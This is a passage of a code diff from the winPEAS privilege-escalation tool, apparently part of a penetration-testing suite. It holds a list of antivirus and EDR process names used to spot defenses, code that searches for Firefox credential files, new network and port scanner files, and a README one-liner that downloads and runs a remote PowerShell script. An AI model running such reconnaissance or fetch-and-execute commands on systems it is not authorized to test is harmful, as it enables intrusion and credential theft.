{ "Cynet", new HashSet<string>() { "cynet.exe", "cexplore.exe", "cynet.zerologondetector.exe", } },
{ "Cyradar", new HashSet<string>() { "cyradarexecutorservices.exe", "cyradaredr.exe", "cyradares.exe", } },
{ "DrWeb", new HashSet<string>() { "dwscancl.exe", "drwebsettingprocess.exe", "dwsysinfo.exe", "drwupsrv.exe", "dwnetfilter.exe", "dwscanner.exe", "dwservice.exe", "frwl_notify.exe", "frwl_svc.exe", "spideragent.exe", "spideragent_adm.exe", } },
{ "ESET-NOD32", new HashSet<string>() { "eraagent.exe", "shouldiremoveit.com", "ecmd.exe", "egui.exe", } },
{ "F-Secure", new HashSet<string>() { "fsav32.exe", "fsdfwd.exe", "fsguiexe.exe", "fsav.exe", } },
{ "G Data AntiVirus", new HashSet<string>() { "bootcdwizard.exe", "avkservice.exe", "avktray.exe", "gdgadgetinst32.exe", "ransomwareremovalhelper.exe", "gdlog.exe", "sec.exe", "avkwctlx64.exe", "updategui.exe", "avk.exe", "autorundelayloader.exe", "avkcmd.exe", "avkwscpe.exe", "iupdateavk.exe", } },
{ "GridinSoft Anti-Malware", new HashSet<string>() { "uninst.exe", "gtkmgmtc.exe", "tkcon.exe", "unpacker.exe", } },
{ "IObit Malware Fighter 3", new HashSet<string>() { "imfantivirususb.exe", "actioncenterdownloader.exe", "adsremovalsetup.exe", "feedback.exe", "iobituninstal.exe", "sendbugreport.exe", "imf_iobitdel.exe", "imfantivirustips.exe", "promote.exe", "imfupdater.exe", "imf_actioncenterdownloader.exe", "imfregister.exe", "reprocess.exe", "imfsrv_iobitdel.exe", "liveupdate.exe", "xmaspromote.exe", "spsetup.exe", "imf_downconfig.exe", "uninstallpromote.exe", "bluebirdinit.exe", "imftips.exe", "locallang.exe", "imfinstaller.exe", "aupdate.exe", "startmenu.exe", "iwsimfxp.exe", "ppuninstaller.exe", "taskschedule.exe", "fixplugin.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "imftips_iobitdel.exe", "imfsrv.exe", "iobitcommunities.exe", "autoupdate.exe", "unins000.exe", "homepage.exe", } },
{ "IObit Malware Fighter 6", new HashSet<string>() { "iwsimf_av.exe", "imfantivirususb.exe", "feedback.exe", "sendbugreportnew.exe", "ransomware.exe", "imfantivirustips.exe", "imfdbupdatestat.exe", "imf_actioncenterdownloader.exe", "iwsimf.exe", "browserprotect.exe", "driverscan.exe", "imfregister.exe", "reprocess.exe", "liveupdate.exe", "christmas.exe", "bf.exe", "imf_downconfig.exe", "browsercleaner.exe", "antitracking.exe", "bluebirdinit.exe", "imftips.exe", "imfinstaller.exe", "locallang.exe", "carescan.exe", "imfsrvwsc.exe", "safebox.exe", "aupdate.exe", "iobitliveupdate.exe", "imfchecker.exe", "iwsimfxp.exe", "ppuninstaller.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "exclusivepsimf.exe", "imfanalyzer.exe", "bfimf.exe", "imfsrv.exe", "autoupdate.exe", "spinit.exe", "homepage.exe", "dugtrio.exe", } },
{ "IObit Security 360", new HashSet<string>() { "is360tray.exe", "is360init.exe", "is360srv.exe", "e_privacysweeper.exe", "a_hijackscan.exe", "g_portable.exe", "d_powerfuldelete.exe", "b_securityholes.exe", "is360updater.exe", "unins000.exe", "f_pctuneup.exe", "imf_freesoftwaredownloader.exe", "c_passivedefense.exe", } },
{ "K7AntiVirus Plus by K7 Computing Pvt Ltd", new HashSet<string>() { "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7tlinettemp.exe", "k7tshlpr.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7tsecurityuninstall.exe", "k7rtscan.exe", "k7avscan.exe", "k7crvsvc.exe", "k7tsdbg.exe", "k7emlpxy.exe", } },
{ "K7AntiVirus Premium by K7 Computing Pvt Ltd", new HashSet<string>() { "k7quervarcleaningtool.exe", "k7ndfhlpr.exe", "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsstart.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7mebezatencremovaltool.exe", "k7tlinettemp.exe", "k7tsmain.exe", "k7tshlpr.exe", "k7tssplh.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsreminder.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7rtscan.exe", "k7tsnews.exe", "k7avscan.exe", "k7crvsvc.exe", "k7emlpxy.exe", "k7tsupdt.exe", } },
{ "Kaspersky Anti-Ransomware Tool for Business", new HashSet<string>() { "anti_ransom_gui.exe", "dump_writer_agent.exe", "anti_ransom.exe", } },
{ "Kaspersky Anti-Virus 2011", new HashSet<string>() { "kldw.exe", } },
{ "Kaspersky Anti-Virus 2013", new HashSet<string>() { "ffcert.exe", } },
{ "Kaspersky Anti-Virus Personal", new HashSet<string>() { "kavsend.exe", "kavsvc.exe", "getsysteminfo.exe", "uninstall.exe", } },
{ "Kaspersky Antivirus", new HashSet<string>() { "avp.exe", } },
{ "Kaspersky", new HashSet<string>() { "klnagent.exe", } },
{ "Malwarebytes", new HashSet<string>() { "mbam.exe", "mbar.exe", "mbae.exe", } },
{ "McAfee All Access AntiVirus Plus", new HashSet<string>() { "compatibilitytester.exe", "mispreg.exe", "mcods.exe", "mcvsmap.exe", "mcocrollback.exe", "mpfalert.exe", "mcvulalert.exe", "mvsinst.exe", "mcupdmgr.exe", "mcpvtray.exe", "mcvuladmagnt.exe", "mcvulunpk.exe", "qcshm.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcvsshld.exe", "mcinstru.exe", "mcvulcon.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "mcsvrcnt.exe", "mcvulusragnt.exe", "shrcl.exe", "mcodsscan.exe", "mcapexe.exe", "mcautoreg.exe", "mcinfo.exe", "mcvulctr.exe", "svcdrv.exe", } },
{ "McAfee AntiSpyware", new HashSet<string>() { "msssrv.exe", "mcspy.exe", "msscli.exe", } },
{ "McAfee AntiVirus Plus", new HashSet<string>() { "mispreg.exe", "mcvsmap.exe", "mcods.exe", "mcactinst.exe", "mcocrollback.exe", "mpfalert.exe", "mcinsupd.exe", "langsel.exe", "mvsinst.exe", "mcshell.exe", "mfehidin.exe", "mchlp32.exe", "mcupdmgr.exe", "saupd.exe", "uninstall.exe", "mcawfwk.exe", "qcshm.exe", "mcsacore.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcinstru.exe", "mcvsshld.exe", "mcoobeof.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "saui.exe", "mcsvrcnt.exe", "shrcl.exe", "mcsmtfwk.exe", "mcautoreg.exe", "mcuninst.exe", "mcinfo.exe", "actutil.exe", } },
{ "McAfee Antivirus", new HashSet<string>() { "mcafee.exe", } },
{ "NANO Antivirus beta by Nano Security Ltd", new HashSet<string>() { "nanoreportc64.exe", "nanorst.exe", "uninstall.exe", "nanoreport.exe", "nanosvc.exe", "nanoav64.exe", "nanoreportc.exe", } },
{ "NANO-Antivirus", new HashSet<string>() { "nanoav.exe", } },
{ "Norton Antivirus", new HashSet<string>() { "nortonsecurity.exe", } },
{ "PCMatic", new HashSet<string>() { "pcmaticpushcontroller.exe", "pcmaticrt.exe", } },
{ "Panda Security", new HashSet<string>() { "psanhost.exe", } },
{ "Panda", new HashSet<string>() { "avengine.exe", } },
{ "Quick Heal AntiVirus Pro", new HashSet<string>() { "delnboot.exe", "0000007c_afupdfny.exe", "asmain.exe", "asclsrvc.exe", "acappaa.exe", "activate.exe", } },
{ "Quick Heal Total Security", new HashSet<string>() { "delnboot.exe", "contact.exe", "activate.exe", "acappaa.exe", } },
{ "Sophos Anti-Rootkit 1.5.0", new HashSet<string>() { "helper.exe", "svrtcli.exe", "sctcleanupservice.exe", "native.exe", "svrtservice.exe", "svrtgui.exe", "sarcli.exe", "sctboottasks.exe", } },
{ "Sophos Anti-Virus", new HashSet<string>() { "sav32cli.exe", "savprogress.exe", "savservice.exe", "native.exe", "swi_di.exe", "backgroundscanclient.exe", "savmain.exe", "forceupdatealongsidesgn.exe", "swc_service.exe", "savproxy.exe", "savcleanupservice.exe", "savadminservice.exe", } },
{ "Symantec Endpoint Protection", new HashSet<string>() { "ccsvchst.exe", } },
{ "Symantec", new HashSet<string>() { "sepwscsvc64.exe", } },
{ "Total Defense Anti-Virus", new HashSet<string>() { "caoscheck.exe", "ccprovsp.exe", "caschelp.exe", "caisstutorial.exe", "ccwatcher.exe", "cawsc.exe", "ccevtmgr.exe", "ccprovep.exe", "casc.exe", "cclogconfig.exe", "ccschedulersvc.exe", "cckasubmit.exe", "ccproxysrvc.exe", "caunst.exe", } },
{ "Trend micro", new HashSet<string>() { "uiwinmgr.exe", "ntrtscan.exe", "tmntsrv.exe", "pccpfw.exe", } },
{ "VIPRE Advanced Security by ThreatTrack Security", new HashSet<string>() { "sbamtray.exe", "sbamwsc.exe", "sbamcommandlinescanner.exe", "sbamcreaterestore.exe", "sbamsvc.exe", "avcproxy.exe", "sbbd.exe", } },
{ "VIPRE Antivirus by GFI Software", new HashSet<string>() { "sbamtray.exe", "sbsetupdrivers.exe", "sbamsafemodeui.exe", "sbpimsvc.exe", "sbamwsc.exe", "sbrc.exe", "sfe.exe", "sbagentdiagnostictool.exe", "sbamcommandlinescanner.exe", "sbamsvc.exe", "sbamcreaterestore.exe", "sbamui.exe", } },
{ "ViRobot Anti-Ransomware by HAURI", new HashSet<string>() { "vrbbdsvc.exe", "uninstall.exe", "vrbbdlogviewer.exe", "vrbbdbackup.exe", "vrpuller.exe", } },
{ "ViRobot Internet Security 2011 by HAURI", new HashSet<string>() { "hvrpcuselock.exe", "hvrlogview.exe", "hvreasyrobot.exe", "hvrsetup.exe", "hvrfilewipe.exe", "hvrmalsvc.exe", "hvrtrafficviewer.exe", "hvrscan.exe", "hvrcontain.exe", "hvrquarantview.exe", "hvrtray.exe", } },
{ "Webroot", new HashSet<string>() { "wrsa.exe", } },
{ "Windows defender", new HashSet<string>() { "msmpeng.exe", "mpcmdrun.exe", "msascuil.exe", "windefend.exe", "msascui.exe", "msmpsvc.exe", } },
{ "Zillya Internet Security by ALLIT Service", new HashSet<string>() { "drvcmd.exe", "ziscore.exe", "keyboard.exe", "systemresearchtool.exe", "zis.exe", "zisnet.exe", "conscan.exe", "zisupdater.exe", "zisaux.exe", "ziships.exe", } },
{ "Zillya! Antivirus by ALLIT Service", new HashSet<string>() { "wscmgr.exe", "drvcmd.exe", "zillya.exe", "zavaux.exe", "reporter.exe", "autoruntool.exe", "taskmanagertool.exe", } },
{ "Zillya! Internet Security by ALLIT Service", new HashSet<string>() { "restoretool.exe", "drvcmd.exe", "wscmgr.exe", "zefcore.exe", "zefsvc.exe", "fwdisabler.exe", "zefaux.exe", "backuphostfile.exe", "conscanner.exe", "reporter.exe", "autoruntool.exe", "zef.exe", "taskmanagertool.exe", } },
{ "ZoneAlarm Anti-Ransomware by Check Point Software", new HashSet<string>() { "zup.exe", "consrvhost.exe", "zaarupdateservice.exe", "zaar.exe", "sbacipollasrvhost.exe", "uninst.exe", } },
{ "ZoneAlarm Antivirus by Check Point, Inc", new HashSet<string>() { "threatemulation.exe", "multiscan.exe", "restoreutility.exe", "vsmon.exe", "zatray.exe", "multifix.exe", } },
{ "ZoneAlarm by Check Point, Inc", new HashSet<string>() { "instmtdr.exe", "zatutor.exe", "cpes_clean.exe", "multiscan.exe", "zauninst.exe", "zlclient.exe", "multifix.exe", } }
};
// reverse lookup list
public static Dictionary<string, HashSet<string>> AVVendorsByProcess = new Dictionary<string, HashSet<string>>();
static DefensiveProcesses()
{
// initialize the structure here
foreach (var kvp in Definitions)
{
var vendor = kvp.Key;
foreach (var executable in kvp.Value)
{
var sanitizedExecutable = executable.Trim().ToLower();
if (!AVVendorsByProcess.ContainsKey(sanitizedExecutable))
{
AVVendorsByProcess.Add(sanitizedExecutable, new HashSet<string>() { vendor });
}
else
{
AVVendorsByProcess[sanitizedExecutable].Add(vendor);
}
}
}
}
}
}

4
winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
View File

@ -133,7 +133,7 @@ namespace winPEAS.Info.SystemInfo
IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties();
string dnsDomain = properties.DomainName;
const string query = "SELECT HotFixID FROM Win32_QuickFixEngineering";
const string query = "SELECT HotFixID,InstalledOn FROM Win32_QuickFixEngineering";
using (var search = new ManagementObjectSearcher(query))
{
@ -142,7 +142,7 @@ namespace winPEAS.Info.SystemInfo
string hotfixes = "";
foreach (ManagementObject quickFix in collection)
{
hotfixes += quickFix["HotFixID"].ToString() + ", ";
hotfixes += quickFix["HotFixID"] + " (" + quickFix["InstalledOn"] + "), ";
}
results.Add("Hostname", strHostName);

2
winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
View File

@ -120,7 +120,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
string firefoxCredentialFile4 = $"{directory}\\{"key4.db"}";
if (File.Exists(firefoxCredentialFile4))
{
results.Add(firefoxCredentialFile4);
results.Add(firefoxCredentialFile3);
}
}
}

13
winPEAS/winPEASexe/winPEAS/winPEAS.csproj
View File

@ -118,6 +118,7 @@
<Reference Include="System.Core" />
<Reference Include="System.DirectoryServices.AccountManagement" />
<Reference Include="System.Management" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Security" />
<Reference Include="System.ServiceProcess" />
<Reference Include="System.Transactions" />
@ -1002,6 +1003,7 @@
<Compile Include="3rdParty\YamlSerializer\YamlTagValidator.cs" />
<Compile Include="Checks\ApplicationsInfo.cs" />
<Compile Include="Checks\BrowserInfo.cs" />
<Compile Include="Checks\CloudInfo.cs" />
<Compile Include="Checks\FileAnalysis.cs" />
<Compile Include="Checks\FilesInfo.cs" />
<Compile Include="Checks\Globals.cs" />
@ -1038,6 +1040,11 @@
<Compile Include="Info\ApplicationInfo\DeviceDrivers.cs" />
<Compile Include="Info\ApplicationInfo\InstalledApps.cs" />
<Compile Include="Helpers\Beaprint.cs" />
<Compile Include="Info\CloudInfo\AWSInfo.cs" />
<Compile Include="Info\CloudInfo\AzureInfo.cs" />
<Compile Include="Info\CloudInfo\EndpointData.cs" />
<Compile Include="Info\CloudInfo\GCPInfo.cs" />
<Compile Include="Info\CloudInfo\CloudInfoBase.cs" />
<Compile Include="Info\EventsInfo\Logon\ExplicitLogonEventInfo.cs" />
<Compile Include="Info\EventsInfo\Logon\Logon.cs" />
<Compile Include="Info\EventsInfo\Logon\LogonEventInfo.cs" />
@ -1058,7 +1065,7 @@
<Compile Include="Info\FilesInfo\Office\OfficeRecentFileInfo.cs" />
<Compile Include="Info\FilesInfo\Office\OneDrive\CloudSyncProviderInfo.cs" />
<Compile Include="Info\FilesInfo\Office\OneDrive\OneDriveSyncProviderInfo.cs" />
<Compile Include="Info\FilesInfo\WSL\WSL.cs" />
<Compile Include="Info\FilesInfo\WSL\WSLHelper.cs" />
<Compile Include="Info\NetworkInfo\Enums\IPVersion.cs" />
<Compile Include="Info\NetworkInfo\Enums\MibTcpState.cs" />
<Compile Include="Info\NetworkInfo\Enums\Protocol.cs" />
@ -1068,6 +1075,10 @@
<Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsInfo.cs" />
<Compile Include="Info\NetworkInfo\InternetSettings\InternetSettingsKey.cs" />
<Compile Include="Info\NetworkInfo\NetworkConnection.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetPinger.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetworkUtils.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\NetworkScanner.cs" />
<Compile Include="Info\NetworkInfo\NetworkScanner\PortScanner.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCP6ROW_OWNER_PID.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCP6TABLE_OWNER_PID.cs" />
<Compile Include="Info\NetworkInfo\Structs\MIB_TCPROW_OWNER_PID.cs" />

2
winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
View File

@ -5,7 +5,7 @@
</StartArguments>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
<StartArguments>fileanalysis debug</StartArguments>
<StartArguments>cloudinfo -network="auto" -ports="21,22,445"</StartArguments>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
<StartArguments>debug</StartArguments>

4
winPEAS/winPEASps1/README.md
View File

@ -17,10 +17,8 @@ Download the **[latest releas from here](https://github.com/peass-ng/PEASS-ng/re
```bash
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
```
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop